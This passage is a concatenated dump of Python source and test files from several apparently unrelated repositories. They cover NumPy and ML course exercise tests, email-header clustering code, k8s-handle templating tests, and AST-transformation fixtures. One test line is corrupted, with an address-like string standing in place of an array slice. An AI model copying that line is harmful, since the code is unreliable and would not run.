gd = GradientDescent(alpha=0.1)
X = np.array([[1, 2, 3, 4, 5],
[1, 2, 3, 4, 5],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]])
y = np.array([1, 1, 2, 2])
gd.fit(X, y)
self.assertEquals(1, gd.predict(np.array([1, 2, 3, 4, 5])))
self.assertEquals(0, gd.predict(np.array([0, 0, 0, 0, 0])))
```
#### File: Read data/tests/test_task.py
```python
import unittest
from task import read_data
# The reference implementation:
# def read_data(fname):
# data = np.genfromtxt(fname, delimiter=',')
# X, y = data[:, :-1], data[:, -1]
# X = (X - X.mean(axis=0)) / X.std(axis=0)
# X = np.concatenate((-np.ones(len(X)).reshape(-1, 1), X), axis=1)
# y = -(y * 2 - 1)
# return X, y
class TestCase(unittest.TestCase):
def test_X(self):
X, y = read_data("pima-indians-diabetes.csv")
self.assertEqual((768, 9), X.shape, "Wrong train data length")
def test_y(self):
X, y = read_data("pima-indians-diabetes.csv")
self.assertEqual(768, len(y), "Wrong train data length")
def test_y_value(self):
X, y = read_data("pima-indians-diabetes.csv")
self.assertTrue(((y == -1) | (y == 1)).all(), "y array should contain only -1 and 1 values")
```
|
{
"source": "jetbrains-academy/Machine-Learning-101-RU",
"score": 3
}
|
#### File: Train and Predict/tests/test_task.py
```python
import unittest
import numpy as np
from numpy.ma.testutils import assert_array_equal
from network import NN
class TestCase(unittest.TestCase):
def test_predict(self):
X_train = np.array([[0, 0, 1],
[1, 1, 1],
[1, 0, 1],
[0, 1, 1]])
y_train = np.array([[0, 1, 1, 0]]).T
nn = NN(3, 3, 1)
for i in range(11):
if i == 10:
self.fail()
try:
nn.train(X_train, y_train)
nn_y = nn.predict(X_train)
assert_array_equal((nn_y > 0.5).astype(int), y_train)
break
except:
continue
```
|
{
"source": "jetbrains-academy/Python-Libraries-NumPy",
"score": 3
}
|
#### File: Random Shuffle/tests/test_task.py
```python
import unittest
import numpy as np
from task import arr, permuted_2d, fully_random
class TestCase(unittest.TestCase):
def test_shape(self):
self.assertEqual((5, 20), arr.shape, msg="Wrong shape of the array 'arr'.")
self.assertEqual((5, 20), permuted_2d.shape, msg="Wrong shape of the array 'permuted_2d'.")
self.assertEqual((5, 20), fully_random.shape, msg="Wrong shape of the array 'fully_random'.")
def test_arr(self):
for i in arr:
# This test checks if in each row the minimum element goes first and maximum - last.
self.assertTrue(i[0] == min(i) and i[-1] == max(i), msg="'arr' should be shuffled along the 0th axis.")
def test_two_d(self):
for i in permuted_2d:
# This test checks that differences between all neighboring elements in rows of the array
# are not equal to 1 (in non-shuffled rows they would be).
self.assertFalse(all([(x - i[i.tolist().index(x) - 1]) == 1 for x in i if i.tolist().index(x) > 0]),
msg="'permuted_2d' should be shuffled along the 1st axis.")
def test_random(self):
# This test checks if elements were also randomized between the rows.
for i in fully_random:
self.assertTrue(max(i) - min(i) > 19, "'fully_random' needs to be fully shuffled.")
```
#### File: Reading and Writing Files/tests/test_task.py
```python
import unittest
import numpy as np
from task import arr
# todo: replace this with an actual test
class TestCase(unittest.TestCase):
def test_add(self):
self.assertEqual((100, 4), arr.shape, msg="Wrong array shape.")
```
#### File: Indexing Basics/tests/test_task.py
```python
import unittest
import numpy as np
from task import a, b, x
class TestCase(unittest.TestCase):
def test_arrays_shape(self):
self.assertEqual((5, 2), b.shape, msg="Wrong shape of array b.")
def test_array_content(self):
self.assertEqual(19, a, msg="a has to be equal to 19.")
def test_array_b(self):
np.testing.assert_array_equal(b, x[::2, fc00:e968:6179::de52:7100], err_msg='Something wrong in array b.')
```
#### File: Integer Array Indexing/tests/test_task.py
```python
import unittest
import numpy as np
from task import x, y, a, b, c, d, e
class TestCase(unittest.TestCase):
def test_shape_a(self):
self.assertEqual((4,), a.shape, msg='Wrong shape of array a.')
def test_shape_b(self):
self.assertEqual((3, 3), b.shape, msg='Wrong shape of array b.')
def test_shape_c(self):
self.assertEqual((3, 7), c.shape, msg='Wrong shape of array c.')
def test_shape_d(self):
self.assertEqual((3,), d.shape, msg='Wrong shape of array d.')
def test_shape_e(self):
self.assertEqual((3,), e.shape, msg='Wrong shape of array e.')
def test_array_a(self):
np.testing.assert_array_equal(a, x[np.array([7, 13, 28, 33])], err_msg='Array a is not what we expected.')
def test_array_b(self):
np.testing.assert_array_equal(b, x[np.array([[0, 1, 2], [10, 11, 12], [28, 29, 30]])], err_msg='Array b is not what we expected.')
def test_array_c(self):
np.testing.assert_array_equal(c, y[np.array([0, 2, 4])], err_msg='Array c is not what we expected.')
def test_array_d(self):
np.testing.assert_array_equal(d, y[np.array([0, 2, 4]), np.array([0, 1, 2])], err_msg='Array d is not what we expected.')
def test_array_e(self):
np.testing.assert_array_equal(e, y[np.array([1, 2, 4]), 6], err_msg='Array e is not what we expected.')
```
#### File: Basic Math Functions/tests/test_task.py
```python
import unittest
import numpy as np
from task import calculate_entropy
rng = np.random.default_rng()
a = rng.integers(1, 20, size=10) # Generate some dataset.
b = a / sum(a)
task_data = [0.16666667, 0.01754386, 0.05263158, 0.13157895, 0.16666667,
0.13157895, 0.14035088, 0.01754386, 0.12280702, 0.05263158]
print(-np.sum(b * np.log2(b)))
class TestCase(unittest.TestCase):
def test_entropy_task_data(self):
self.assertEqual(-np.sum(task_data * np.log2(task_data)), calculate_entropy(task_data),
msg='Wrong answer for task dataset.')
def test_entropy_test(self):
self.assertEqual(-np.sum(b * np.log2(b)), calculate_entropy(b),
msg='Wrong answer for test dataset.')
```
#### File: Linear Algebra/tests/test_task.py
```python
import unittest
import numpy as np
from task import *
test_values, test_labels = np.array(csv[:, :2], dtype=float), np.array(csv[:, 2], dtype=np.int64)
class TestCase(unittest.TestCase):
def test_values(self):
np.testing.assert_array_equal(values, test_values, err_msg='Input values were not extracted properly from the '
'csv.')
def test_labels(self):
np.testing.assert_array_equal(labels, test_labels, err_msg='Labels were not extracted properly from the '
'csv.')
def test_predict(self):
result = predict(values)
test_result = predict(test_values)
np.testing.assert_array_equal(result, test_result, err_msg='Something wrong with the prediction.')
```
#### File: bincount/tests/test_task.py
```python
import unittest
from task import find_most_frequent_class
class TestCase(unittest.TestCase):
def test_most_frequent_class1(self):
self.assertEqual(1, find_most_frequent_class('data.csv'), msg="Incorrect class found for task data.")
def test_most_frequent_class2(self):
self.assertEqual(4, find_most_frequent_class('test_data1.csv'), msg="Incorrect class found for test data.")
def test_most_frequent_class3(self):
self.assertEqual(37, find_most_frequent_class('test_data2.csv'), msg="Incorrect class found for test data.")
```
#### File: Element-wise Comparison/tests/test_task.py
```python
import unittest
import numpy as np
from task import *
class TestCase(unittest.TestCase):
def test_array_b(self):
test_b = np.arange(0, 25, 6)
self.assertEqual(test_b.shape, b.shape, msg='Shape of array b has to be (5,).')
def test_array_c(self):
test_b = np.arange(0, 25, 6)
test_c = np.equal(a, test_b)
np.testing.assert_array_equal(compare_a_b, test_c, err_msg='Boolean arrays do not match.')
```
#### File: Search/tests/test_task.py
```python
import unittest
import numpy as np
from task import temperatures, days, high, low, result, warm_days
class TestCase(unittest.TestCase):
def test_week(self):
high_test = ['High']
low_test = ['Low']
np.testing.assert_array_equal(result, np.where(temperatures > 15, high_test, low_test),
err_msg='Your `result` array '
'does not contain the values we expected.')
def test_shape(self):
self.assertEqual(days.shape, result.shape, msg='Shape of the array `result` should match the shape of `days`.')
def test_names(self):
np.testing.assert_array_equal(warm_days, days[temperatures > 15],
err_msg='`warm_days` array is off. It should contain '
'the names of days when temperature was higher than 15')
```
#### File: Partial Sort/tests/test_task.py
```python
import unittest
from task import *
class TestCase(unittest.TestCase):
def test_indices(self):
self.assertEqual(distances.shape, indices.shape, msg="`indices` has to have the same shape as `distances`.")
def test_partition(self):
partitioned_distances = abs(partitioned_by_distance - target)
self.assertTrue(all([partitioned_distances[i] < partitioned_distances[k] for i in range(k)]) and
all([partitioned_distances[i] >= partitioned_distances[k] for i in range(k, arr.shape[0])]),
msg='`partitioned_by_distance` does not seem to be partitioned.')
def test_k_nearest(self):
self.assertEqual(3, k_nearest.shape[0], msg='k_nearest should contain 3 values closest to 0.')
```
#### File: Transposing Sorting Concatenating/Transpose 1D/task.py
```python
import numpy as np
def reshape_transpose(start, stop, step=1):
array = np.arange(start, stop, step)
reshaped = array.reshape(1, array.shape[0])
return reshaped.T
if __name__ == '__main__':
print(reshape_transpose(1, 100, 10))
print(reshape_transpose(0, 5))
```
#### File: SVD on One Matrix/tests/test_task.py
```python
import unittest
import numpy as np
from numpy import linalg
from task import img_gray, U, s, Vt
class TestCase(unittest.TestCase):
def test_svd(self):
test_U, test_s, test_Vt = linalg.svd(img_gray)
np.testing.assert_array_equal(U, test_U,
'Matrix U doesn\'t match the expected. Use linalg.svd to complete the task.')
np.testing.assert_array_equal(s, test_s,
'Matrix s doesn\'t match the expected. Use linalg.svd to complete the task.')
np.testing.assert_array_equal(Vt, test_Vt,
'Matrix Vt doesn\'t match the expected.Use linalg.svd to complete the task.')
```
|
{
"source": "JetBrains/email-parser",
"score": 3
}
|
#### File: clustering/cluster/token.py
```python
import re
token_reg_ex = {
"DAY": re.compile("^\\d{1,2}[,\\.]?:?$"),
"YEAR": re.compile("^[12]\\d{3}[,\\.]?:?$"),
"DATE_SHORT": re.compile(
"^(([0-3]?[0-9][/.-][0-3]?[0-9][/.-](?:[0-9]{2})?[0-9]{2})|" +
"((?:[0-9]{2})?[0-9]{2}[/.-][0-3]?[0-9][/.-][0-3]?[0-9]))[,\\.]?:?$"),
"TIME": re.compile(
"^([01]?[0-9]|2[0-3]):[0-5][0-9](:[0-5][0-9])?[,\\.]?:?$"),
"EMAIL": re.compile("\\S+@\\S+")
}
attribute_reg_ex = {
"LAST_COLON": re.compile(".*:$")
}
token_type = {
"UNDEFINED": 0,
"DATE_RELATED": 1,
"DAY": 2,
"YEAR": 3,
"DATE_SHORT": 4,
"TIME": 5,
"EMAIL": 6
}
def check(regex, text):
res = re.match(regex, text)
if res is not None:
return res.group() == text
return False
class Token:
# --- Customizable values ---
INSERTION_COST = {
"UNDEFINED": 10,
"DATE_RELATED": 15,
"DAY": 30,
"YEAR": 30,
"DATE_SHORT": 40,
"TIME": 10,
"EMAIL": 50
}
'''
The cost of replacement the first token by the second.
Usage:
type_min_id = min(token1.type_id, token2.type_id)
type_max_id = max(token1.type_id, token2.type_id)
Token.REPLACEMENT_COST[type_max_id][type_min_id]
'''
REPLACEMENT_COST = [
[0],
[15, 0],
[15, 15, 0],
[15, 15, 15, 0],
[35, 35, 35, 35, 0],
[10, 10, 10, 10, 10, 0],
[50, 50, 50, 50, 50, 50, 0]
]
LAST_COLON_INEQUALITY_COST = 35
# ----------------------------
def __get_token_type_tuple(self):
for type_, index in token_type.items():
if type_ != "UNDEFINED" and type_ != "DATE_RELATED" and check(
token_reg_ex[type_], self.text):
return type_, index
return "UNDEFINED", 0
def __init__(self, text):
self.text = text
type_name, type_id = self.__get_token_type_tuple()
self.type_name = type_name
self.type_id = type_id
self.has_last_colon = False
def __ne__(self, other):
if not isinstance(other, Token):
return NotImplemented
elif self is other:
return True
else:
if self.type_id != other.type_id:
return False
if self.has_last_colon != other.has_last_colon:
return False
return True
def get_insertion_cost(self):
return self.INSERTION_COST[self.type_name]
def get_deletion_cost(self):
return self.get_insertion_cost()
def last_colon_difference(self, other):
if self.has_last_colon != other.has_last_colon:
return Token.LAST_COLON_INEQUALITY_COST
else:
return 0
def get_difference(self, other):
difference = 0
if self.type_name != other.type_name:
type_min_id = min(self.type_id, other.type_id)
type_max_id = max(self.type_id, other.type_id)
difference += self.REPLACEMENT_COST[type_max_id][type_min_id]
difference += self.last_colon_difference(other)
return difference
def __str__(self):
return self.text + "(" + self.type_name + ") last_colon = " + str(
self.has_last_colon)
def set_type(self, new_type_name):
if new_type_name not in token_type:
raise Exception("Illegal token type.")
self.type_name = new_type_name
self.type_id = token_type[new_type_name]
```
#### File: clustering/executable/mst_clustering.py
```python
import sys
import os
sys.path.append(os.getcwd())
import time
import numpy as np
from sklearn.cluster import AffinityPropagation
from sklearn import metrics
from cluster.prepare_data import get_labels, get_affinity_matrix, \
read_dist_matrix, write_clusterized_data, print_metrics, setup_costs
from cluster.prepare_data import get_headers_pairs_list
from cluster.token_edit_distance import get_distance_matrix
from sklearn.utils.sparsetools._traversal import connected_components, \
csr_matrix
# -------------
__parent = dict()
__rank = dict()
def __make_set(vertice):
__parent[vertice] = vertice
__rank[vertice] = 0
def __find(vertice):
if __parent[vertice] != vertice:
__parent[vertice] = __find(__parent[vertice])
return __parent[vertice]
def __union(vertice1, vertice2):
root1 = __find(vertice1)
root2 = __find(vertice2)
if root1 != root2:
if __rank[root1] > __rank[root2]:
__parent[root2] = root1
else:
__parent[root1] = root2
if __rank[root1] == __rank[root2]:
__rank[root2] += 1
def __kruskal(graph):
for vertice in range(graph['vertices_num']):
__make_set(vertice)
minimum_spanning_tree = set()
edges = list(graph['edges'])
edges.sort()
for edge in edges:
weight, vertice1, vertice2 = edge
if __find(vertice1) != __find(vertice2):
__union(vertice1, vertice2)
minimum_spanning_tree.add(edge)
return minimum_spanning_tree
def get_mst(distance_matrix):
edges = set()
for i, line in enumerate(distance_matrix):
for j, e in enumerate(line):
if j < i:
edges.add((distance_matrix[i][j], i, j))
graph = {
'vertices_num': len(distance_matrix),
'edges': edges
}
return __kruskal(graph)
def get_cluster(mst_, min_dist=10):
if min_dist <= 0:
raise Exception("min_dist must be positive, but {0}".format(min_dist))
mst_sorted = sorted(mst_, key=lambda x: x[0])
idx = len(mst_sorted)
for i in range(len(mst_sorted)):
if mst_sorted[i][0] > min_dist:
idx = i
break
return mst_sorted[:idx]
def get_labels_predict(edges, n):
row = []
col = []
data = []
for (cost, from_, to_) in edges:
row.append(from_)
col.append(to_)
data.append(cost)
row.append(to_)
col.append(from_)
data.append(cost)
csr_graph = csr_matrix((data, (row, col)), shape=(n, n))
return connected_components(csr_graph, directed=False)
def fit(dist_matr, min_dist=10):
mst = get_mst(dist_matr)
conn_components = get_cluster(mst, min_dist)
n_clusters, labels = get_labels_predict(conn_components, len(dist_matr))
return n_clusters, labels
# --------
def clustering(headers, min_dist, distance_matrix_filename=None):
if distance_matrix_filename is None:
dist_matrix, _ = get_distance_matrix(headers)
else:
dist_matrix, _ = read_dist_matrix(distance_matrix_filename)
n_clusters_, labels = fit(dist_matrix, min_dist)
return metrics.silhouette_score(np.asmatrix(dist_matrix), labels,
metric='precomputed')
def main(dataset_filename, output_data_filename,
distance_matrix_filename=None, display=False, min_dist=10):
start = time.perf_counter()
headers_pairs = get_headers_pairs_list(dataset_filename, verbose=True)
labels_true = get_labels(dataset_filename, verbose=True)
if distance_matrix_filename is None:
dist_matrix, max_dist = get_distance_matrix(list(map(lambda x: x[1],
headers_pairs)),
verbose=True)
else:
dist_matrix, max_dist = \
read_dist_matrix(distance_matrix_filename, verbose=True)
print("Clustering...")
n_clusters_, labels = fit(dist_matrix, min_dist)
print("Done.")
print("clusters {0}".format(n_clusters_))
print(labels)
metrics_list = [
n_clusters_,
metrics.homogeneity_score(labels_true, labels),
metrics.completeness_score(labels_true, labels),
metrics.v_measure_score(labels_true, labels),
metrics.adjusted_rand_score(labels_true, labels),
metrics.adjusted_mutual_info_score(labels_true, labels),
metrics.silhouette_score(np.asmatrix(dist_matrix), labels,
metric='precomputed')
]
print_metrics(metrics_list)
write_clusterized_data(output_data_filename, headers_pairs, labels,
metrics=metrics_list, verbose=True)
end = time.perf_counter()
print("\nWorking time: %f sec." % (end - start))
# if display:
# visualize(dist_matrix, labels, cluster_centers_indices,
# show_cluster_sizes=True)
def get_average(params):
(ins_cost, repl_matr, colon_cost) = params
sum = colon_cost
for line in repl_matr:
for x in line:
sum += x
for x in ins_cost:
sum += x
return sum // 29
if __name__ == "__main__":
if len(sys.argv) < 3:
print(
"Too few arguments. You should provide: \n1. dataset_filename" +
"\n2. output_data_filename \n3. distance_matrix_filename (optional)"
)
sys.exit()
dataset_filename_ = sys.argv[1]
output_data_filename_ = sys.argv[2]
distance_matrix_filename_ = sys.argv[3] if len(sys.argv) > 3 else None
params = [[108, 116, 112, 76, 100, 147, 158], [[66], [36, 143], [158, 41, 63], [86, 56, 61, 12], [136, 10, 10, 190, 119], [146, 10, 52, 64, 75, 122]], 157]
setup_costs(params)
avg = get_average(params)
print(avg)
main(dataset_filename_, output_data_filename_, min_dist=avg)
```
|
{
"source": "jetbrains-infra/k8s-handle",
"score": 4
}
|
#### File: k8s-handle/k8s_handle/dictionary.py
```python
import copy
def merge(dict_x, dict_y):
result = copy.deepcopy(dict_x)
for key, value in dict_y.items():
if isinstance(value, dict) and isinstance(result.get(key), dict):
result[key] = merge(result[key], value)
continue
result[key] = value
return result
```
#### File: k8s/availability_checker/test_resource_getters.py
```python
from unittest import TestCase
from k8s_handle.k8s.mocks import ResourcesAPIMock
from .resource_getters import CoreResourceGetter, RegularResourceGetter
from .mocks import MockResource
class TestCoreResourceGetter(TestCase):
def setUp(self):
self.getter = CoreResourceGetter(
ResourcesAPIMock(group_version="v1", resources=[MockResource("Pod"), MockResource("CronJob")])
)
def test_is_processable_version(self):
self.assertTrue(self.getter.is_processable_version("v1"))
self.assertFalse(self.getter.is_processable_version("app/v1"))
self.assertFalse(self.getter.is_processable_version("/"))
self.assertFalse(self.getter.is_processable_version(""))
def test_get_resources_by_version(self):
self.assertSetEqual({"Pod", "CronJob"}, self.getter.get_resources_by_version("v1"))
self.assertSetEqual(set(), self.getter.get_resources_by_version("v2"))
class TestRegularResourceGetter(TestCase):
def setUp(self):
self.getter = RegularResourceGetter(
ResourcesAPIMock(group_version="app/v1", resources=[MockResource("Pod"), MockResource("CronJob")])
)
def test_is_processable_version(self):
self.assertFalse(self.getter.is_processable_version("v1"))
self.assertTrue(self.getter.is_processable_version("app/betav1"))
self.assertTrue(self.getter.is_processable_version("app/v1"))
self.assertFalse(self.getter.is_processable_version("/"))
self.assertFalse(self.getter.is_processable_version(""))
def test_get_resources_by_version(self):
self.assertSetEqual({"Pod", "CronJob"}, self.getter.get_resources_by_version("app/v1"))
self.assertSetEqual(set(), self.getter.get_resources_by_version("app/betav1"))
```
#### File: jetbrains-infra/k8s-handle/setup.py
```python
import os
from setuptools import setup, find_packages
readme_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'README.md')
def get_content(path):
with open(path, 'r') as f:
return f.read()
setup(name='k8s-handle',
version=os.environ.get('RELEASE_TAG', '0.0.0'),
long_description=get_content(readme_path),
long_description_content_type='text/markdown',
description='Provisioning tool for Kubernetes apps',
url='http://github.com/2gis/k8s-handle',
author='<NAME>',
author_email='<EMAIL>',
license='Apache 2.0',
packages=find_packages(exclude=("tests",)),
data_files=['requirements.txt'],
entry_points={
"console_scripts": [
"k8s-handle=k8s_handle:main",
]
},
install_requires=get_content('requirements.txt').split('\n'),
zip_safe=False)
```
#### File: k8s-handle/tests/test_templating.py
```python
import os
import yaml
import shutil
import unittest
from k8s_handle import settings
from k8s_handle import config
from k8s_handle import templating
from k8s_handle.templating import TemplateRenderingError
class TestTemplating(unittest.TestCase):
def setUp(self):
settings.CONFIG_FILE = 'tests/fixtures/config.yaml'
settings.TEMPLATES_DIR = 'templates/tests'
os.environ['CUSTOM_ENV'] = 'My value'
os.environ['K8S_CONFIG_DIR'] = '/tmp/kube/'
def tearDown(self):
if os.path.exists(settings.TEMP_DIR):
shutil.rmtree(settings.TEMP_DIR)
os.environ.pop('CUSTOM_ENV')
os.environ.pop('K8S_CONFIG_DIR')
def test_renderer_init(self):
r = templating.Renderer('/tmp/test')
self.assertEqual(r._templates_dir, '/tmp/test')
def test_none_context(self):
r = templating.Renderer('templates')
with self.assertRaises(RuntimeError) as context:
r.generate_by_context(None)
self.assertTrue('Can\'t generate templates from None context' in str(context.exception), str(context.exception))
def test_generate_templates(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
context = config.load_context_section('test_dirs')
r.generate_by_context(context)
file_path_1 = '{}/template1.yaml'.format(settings.TEMP_DIR)
file_path_2 = '{}/template2.yaml'.format(settings.TEMP_DIR)
file_path_3 = '{}/template3.yaml'.format(settings.TEMP_DIR)
file_path_4 = '{}/innerdir/template1.yaml'.format(settings.TEMP_DIR)
file_path_5 = '{}/template_include_file.yaml'.format(settings.TEMP_DIR)
file_path_6 = '{}/template_list_files.yaml'.format(settings.TEMP_DIR)
self.assertTrue(os.path.exists(file_path_1))
self.assertTrue(os.path.exists(file_path_2))
self.assertTrue(os.path.exists(file_path_3))
with open(file_path_1, 'r') as f:
content = f.read()
self.assertEqual(content, "{'ha_ha': 'included_var'}")
with open(file_path_2, 'r') as f:
content = f.read()
self.assertEqual(content, 'TXkgdmFsdWU=')
with open(file_path_3, 'r') as f:
content = f.read()
self.assertEqual(content, 'My value')
with open(file_path_4, 'r') as f:
content = f.read()
self.assertEqual(content, "{'ha_ha': 'included_var'}")
with open(file_path_5, 'r') as f:
content = f.read()
self.assertEqual(content, "test: |\n {{ hello world }}\n new\n line\n {{ hello world1 }}\n")
with open(file_path_6, 'r') as f:
content = f.read()
self.assertEqual(content, "test: |\n template1.yaml.j2:\n my_file.txt:\n my_file1.txt:\n ")
def test_no_templates_in_kubectl(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
with self.assertRaises(RuntimeError) as context:
r.generate_by_context(config.load_context_section('no_templates'))
self.assertTrue('Templates section doesn\'t have any template items' in str(context.exception))
def test_render_not_existent_template(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
with self.assertRaises(TemplateRenderingError) as context:
r.generate_by_context(config.load_context_section('not_existent_template'))
self.assertTrue('doesnotexist.yaml.j2' in str(context.exception), context.exception)
def test_generate_templates_with_kubectl_section(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
context = config.load_context_section('section_with_kubectl')
r.generate_by_context(context)
file_path_1 = '{}/template1.yaml'.format(settings.TEMP_DIR)
file_path_2 = '{}/template2.yaml'.format(settings.TEMP_DIR)
file_path_3 = '{}/template3.yaml'.format(settings.TEMP_DIR)
file_path_4 = '{}/innerdir/template1.yaml'.format(settings.TEMP_DIR)
self.assertTrue(os.path.exists(file_path_1))
self.assertTrue(os.path.exists(file_path_2))
self.assertTrue(os.path.exists(file_path_3))
with open(file_path_1, 'r') as f:
content = f.read()
self.assertEqual(content, "{'ha_ha': 'included_var'}")
with open(file_path_2, 'r') as f:
content = f.read()
self.assertEqual(content, 'TXkgdmFsdWU=')
with open(file_path_3, 'r') as f:
content = f.read()
self.assertEqual(content, 'My value')
with open(file_path_4, 'r') as f:
content = f.read()
self.assertEqual(content, "{'ha_ha': 'included_var'}")
def test_io_2709(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
with self.assertRaises(TemplateRenderingError) as context:
c = config.load_context_section('io_2709')
r.generate_by_context(c)
self.assertTrue('due to: \'undefined_variable\' is undefined' in str(context.exception))
def test_evaluate_tags(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
tags = {'tag1', 'tag2', 'tag3'}
self.assertTrue(r._evaluate_tags(tags, only_tags=['tag1'], skip_tags=None))
self.assertFalse(r._evaluate_tags(tags, only_tags=['tag4'], skip_tags=None))
self.assertFalse(r._evaluate_tags(tags, only_tags=['tag1'], skip_tags=['tag1']))
self.assertFalse(r._evaluate_tags(tags, only_tags=None, skip_tags=['tag1']))
self.assertTrue(r._evaluate_tags(tags, only_tags=None, skip_tags=['tag4']))
tags = set()
self.assertFalse(r._evaluate_tags(tags, only_tags=['tag4'], skip_tags=None))
self.assertTrue(r._evaluate_tags(tags, only_tags=None, skip_tags=['tag4']))
def test_get_template_tags(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
template_1 = {'template': 'template.yaml.j2', 'tags': ['tag1', 'tag2', 'tag3']}
template_2 = {'template': 'template.yaml.j2', 'tags': 'tag1,tag2,tag3'}
template_3 = {'template': 'template.yaml.j2', 'tags': ['tag1']}
template_4 = {'template': 'template.yaml.j2', 'tags': 'tag1'}
self.assertEqual(r._get_template_tags(template_1), {'tag1', 'tag2', 'tag3'})
self.assertEqual(r._get_template_tags(template_2), {'tag1', 'tag2', 'tag3'})
self.assertEqual(r._get_template_tags(template_3), {'tag1'})
self.assertEqual(r._get_template_tags(template_4), {'tag1'})
def test_get_template_tags_unexpected_type(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
template = {'template': 'template.yaml.j2', 'tags': {'tag': 'unexpected'}}
with self.assertRaises(TypeError) as context:
r._get_template_tags(template)
self.assertTrue('unexpected type' in str(context.exception))
def test_generate_group_templates(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
context = config.load_context_section('test_groups')
r.generate_by_context(context)
file_path_1 = '{}/template1.yaml'.format(settings.TEMP_DIR)
file_path_2 = '{}/template2.yaml'.format(settings.TEMP_DIR)
file_path_3 = '{}/template3.yaml'.format(settings.TEMP_DIR)
self.assertTrue(os.path.exists(file_path_1))
self.assertTrue(os.path.exists(file_path_2))
self.assertTrue(os.path.exists(file_path_3))
def test_templates_regex(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
context = config.load_context_section('templates_regex')
file_path_1 = '{}/template1.yaml'.format(settings.TEMP_DIR)
file_path_2 = '{}/template2.yaml'.format(settings.TEMP_DIR)
file_path_3 = '{}/template3.yaml'.format(settings.TEMP_DIR)
file_path_4 = '{}/template4.yaml'.format(settings.TEMP_DIR)
file_path_5 = '{}/innerdir/template1.yaml'.format(settings.TEMP_DIR)
file_path_6 = '{}/template_include_file.yaml'.format(settings.TEMP_DIR)
r.generate_by_context(context)
self.assertTrue(os.path.exists(file_path_1))
self.assertFalse(os.path.exists(file_path_2))
self.assertFalse(os.path.exists(file_path_3))
self.assertFalse(os.path.exists(file_path_4))
self.assertTrue(os.path.exists(file_path_5))
self.assertFalse(os.path.exists(file_path_6))
def test_templates_regex_parse_failed(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
c = config.load_context_section('templates_regex_invalid')
with self.assertRaises(TemplateRenderingError) as context:
r.generate_by_context(c)
self.assertTrue('Processing [: template [ hasn\'t been found' in str(context.exception))
def test_filters(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
context = config.load_context_section('test_filters')
r.generate_by_context(context)
result = '{}/filters.yaml'.format(settings.TEMP_DIR)
with open(result, 'r') as f:
actual = yaml.safe_load(f)
self.assertEqual('aGVsbG8gd29ybGQ=', actual.get('b64encode'))
self.assertEqual('k8s-handle', actual.get('b64decode'))
self.assertEqual('8fae6dd899aace000fd494fd6d795e26e2c85bf8e59d4262ef56b03dc91e924c', actual.get('sha256'))
affinity = [
{'effect': 'NoSchedule', 'key': 'dedicated', 'operator': 'Equal', 'value': 'monitoring'},
{'effect': 'NoSchedule', 'key': 'dedicated', 'operator': 'Equal', 'value': {'hello': 'world'}}
]
self.assertEqual(affinity, actual.get('affinity'))
def test_dashes(self):
r = templating.Renderer(os.path.join(os.path.dirname(__file__), 'templates_tests'))
context = config.load_context_section('test_dashes')
r.generate_by_context(context)
result = '{}/template-dashes.yaml'.format(settings.TEMP_DIR)
with open(result, 'r') as f:
actual = yaml.safe_load(f)
self.assertEqual('do this', actual)
```
|
{
"source": "JetBrains-Research/ast-transformations",
"score": 2
}
|
#### File: data/class/in_3.py
```python
class A(object):
def __init__(self, arg):
self._arg = arg
```
#### File: data/classes_and_methods/in_1_basic.py
```python
class C:
def __init__(self):
pass
def foo(self, foo, bar):
print(foo, bar, self)
def bar(self):
pass
@classmethod
def class_baz(cls, x):
pass
@staticmethod
def static_yep(a, b, c):
pass
```
#### File: data/variables/in_5_nonlocal.py
```python
def foo():
var = 1
def bar():
nonlocal var
var = 42
i = var
```
#### File: data/variables/out_5.py
```python
def f1():
f1_v1 = 1
def f1_f1():
nonlocal f1_v1
f1_v1 = 42
f1_v2 = f1_v1
```
#### File: constantfolding/data/in_10_docstring.py
```python
def main():
"""
another Augmented Assignment
"""
d = 2 + 2
if __name__ == '__main__':
main()
```
#### File: data/logical/out_1.py
```python
def effect():
print("hello")
def foo():
return 1
pure_f_and = False
pure_t_and = foo()
pure_f_or = foo()
pure_t_or = True
# impure_f_and = ???
impure_t_and = [effect()] and foo()
# impure_f_or = ???
impure_t_or = [effect()]
```
#### File: deadcode/data/in_7_assertion_false.py
```python
def main():
assert False
print(1)
print(2)
```
#### File: deadcode/data/out_2.py
```python
def main(x):
while x % 4 == 0:
if x == 3:
print(1)
print(2)
print(3)
continue
pass
for _ in range(10):
if _ == 3:
break
print("ok")
return 4
```
#### File: multipleOperatorComparison/data/in_3_complex_multiple_comparison.py
```python
x = input()
y = input()
z = input()
flag = z % (1 + 1) == 0 and 1 < x < 123 or 1 > y > x > y < 123
def identity(var):
return var
if x ^ y == 1 or (x % 2 == 0 and 3 > x <= 3 <= y > z >= 5 or identity(-1) + hash('hello') < 10 + 120 < hash('world') - 1):
print(x, y, z)
```
#### File: multipleTargetAssignment/data/in_1_basic_multiple_target.py
```python
def main(x):
a = b = c = 5
```
|
{
"source": "JetBrains-Research/code-change-miner",
"score": 2
}
|
#### File: code-change-miner/vcs/traverse.py
```python
import os
import tempfile
import ast
import uuid
import pickle
import multiprocessing
import time
import json
import subprocess
import datetime
from functools import partial
from log import logger
from pydriller import RepositoryMining
from pydriller.domain.commit import ModificationType
import settings
import changegraph
class GitAnalyzer:
GIT_REPOSITORIES_DIR = settings.get('git_repositories_dir')
STORAGE_DIR = settings.get('change_graphs_storage_dir')
STORE_INTERVAL = settings.get('change_graphs_store_interval', 300)
TRAVERSE_ASYNC = settings.get('traverse_async', True)
MIN_DATE = None
